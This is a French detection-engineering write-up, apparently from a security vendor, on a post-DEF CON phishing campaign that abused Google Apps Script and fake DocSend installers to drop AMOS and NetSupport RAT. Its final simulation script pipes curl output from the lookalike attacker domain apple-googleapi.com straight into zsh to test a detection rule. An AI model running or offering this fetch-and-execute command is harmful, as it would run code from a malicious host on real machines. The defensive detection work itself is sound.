Informaticiens en Sécurité : Comment le Phishing Thématique DEF CON Exploite Google Apps Script pour Distribuer des Logiciels Malveillants
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Les acteurs de la menace ciblent les participants aux conférences de cybersécurité par le biais de l’ingénierie sociale sur X, anciennement Twitter, pour distribuer des logiciels malveillants en utilisant des Google Docs armés et des installateurs DocSend frauduleux. La campagne livre à les utilisateurs de macOS un logiciel espion AMOS, tandis que les victimes sur Windows reçoivent une charge utile à plusieurs étapes impliquant NetSupport RAT et un implant de portefeuille Ledger. L’attaque abuse des barres latérales de Google Apps Script et des invites de type ClickFix pour réduire la suspicion et déclencher l’exécution de code malveillant.
Enquête
Les chercheurs d’Huntress ont interagi avec l’acteur de la menace en se faisant passer pour un dirigeant de CoinDesk pour observer la chaîne d’attaque complète. L’enquête a révélé un processus sophistiqué en plusieurs étapes impliquant Google Apps Script, de faux installateurs signés avec des certificats volés et un proxy local interceptant TLS sur Windows. Les chercheurs ont également identifié une étape secondaire qui exécute JavaScript en mémoire et déploie une autorité de certification frauduleuse.
Atténuation
Les utilisateurs devraient traiter les demandes inattendues d’exécuter des commandes terminales, de contourner Gatekeeper ou d’installer manuellement des mises à jour à partir des barres latérales de documents comme suspectes. Les organisations devraient surveiller les activités inhabituelles de Google Apps Script et l’utilisation non autorisée de certificats de signature de code. Des contrôles stricts sur les terminaux et une vérification indépendante des liens de partage de documents peuvent réduire davantage l’exposition.
Réponse
Si une activité malveillante est détectée, le système affecté devrait être isolé immédiatement pour arrêter l’exfiltration de données ou le mouvement latéral. Les intervenants devraient préserver les preuves médico-légales et envisager de ré-imager l’appareil tout en traitant les identifiants locaux et les données des portefeuilles de cryptomonnaie comme compromis. Les sessions actives devraient être révoquées, les mots de passe réinitialisés et toutes les clés API ou secrets stockés sur le système devraient être tournés.
Flux d’attaque
Nous mettons encore à jour cette partie.
Détections
Commande et contrôle suspect par requête DNS de domaine de premier niveau inhabituel (TLD) (via dns)
Tentative d’exécution de Curl suspect [MacOS] (via cmdline)
Exécution possible par utilisation d’un nom de script court (via cmdline)
Appel de méthodes .NET suspectes à partir de Powershell (via powershell)
IOCs (HashSha256) à détecter : Post-DEF CON Phishing utilise Google Doc Apps Script pour livrer des logiciels malveillants
IOCs (HashMd5) à détecter : Post-DEF CON Phishing utilise Google Doc Apps Script pour livrer des logiciels malveillants
IOCs (SourceIP) à détecter : Post-DEF CON Phishing utilise Google Doc Apps Script pour livrer des logiciels malveillants
IOCs (DestinationIP) à détecter : Post-DEF CON Phishing utilise Google Doc Apps Script pour livrer des logiciels malveillants
Détection du déploiement de DocSend trojanisé et NetSupport RAT [Création de processus Windows]
Exécution potentielle de script shell malveillant sur macOS [Création de processus Linux]
Détection de communication malveillante et de livraison de charge utile [Connection réseau Windows]
Détecter la création et l’exécution de scripts PowerShell malveillants [Windows Powershell]
## Exécution de simulation
Condition préalable : le contrôle de pré-vol de télémétrie et de ligne de base doit avoir réussi.
Raisonnement : cette section détaille l’exécution précise de la technique de l’adversaire (TTP) destinée à déclencher la règle de détection. Les commandes et le récit doivent refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.
-
Récit d’attaque et commandes : L’adversaire vise à obtenir un accès initial sur une station de travail macOS en se faisant passer pour un processus de mise à jour légitime de Google API. Ils utilisent une tactique d’ingénierie sociale où l’utilisateur est invité à exécuter une commande dans le Terminal. La commande utilise
curlpour récupérer une charge utile depuisapple-googleapi.com(un domaine typographique/se ressemblant) et achemine la sortie directement danszsh. Cette approche « vivre de la terre » tente de minimiser l’empreinte médico-légale sur le système de fichiers en exécutant le code directement depuis le flux réseau. -
Script de test de régression :
#!/bin/bash # Script de simulation pour déclencher la règle d'"Exécution potentielle de script shell malveillant". # Remarque : Nous utilisons une URL factice qui imite la structure du domaine pour éviter les appels externes réels si souhaité, # mais pour que la règle fonctionne, la ligne de commande DOIT contenir 'apple-googleapi.com'. echo "[*] Début de la simulation : Mimique de tuyau de shell malveillant..." # Cette commande satisfait toutes les conditions : # 1. Le processus est zsh/sh/bash # 2. Contient 'curl' # 3. Contient '| zsh' # 4. Contient 'apple-googleapi.com' # Nous utilisons une URL inexistante pour empêcher l'exécution réelle de la charge utile tout en générant toujours la télémétrie. curl -s http://apple-googleapi.com/update.sh | zsh echo "[*] Commande de simulation envoyée." -
Commandes de nettoyage :
# Aucun fichier n'est créé sur le disque par la commande d'attaque elle-même, # mais si des artefacts ont été générés, ils devraient être supprimés. rm -f ~/Downloads/update.sh 2>/dev/null echo "[*] Nettoyage terminé."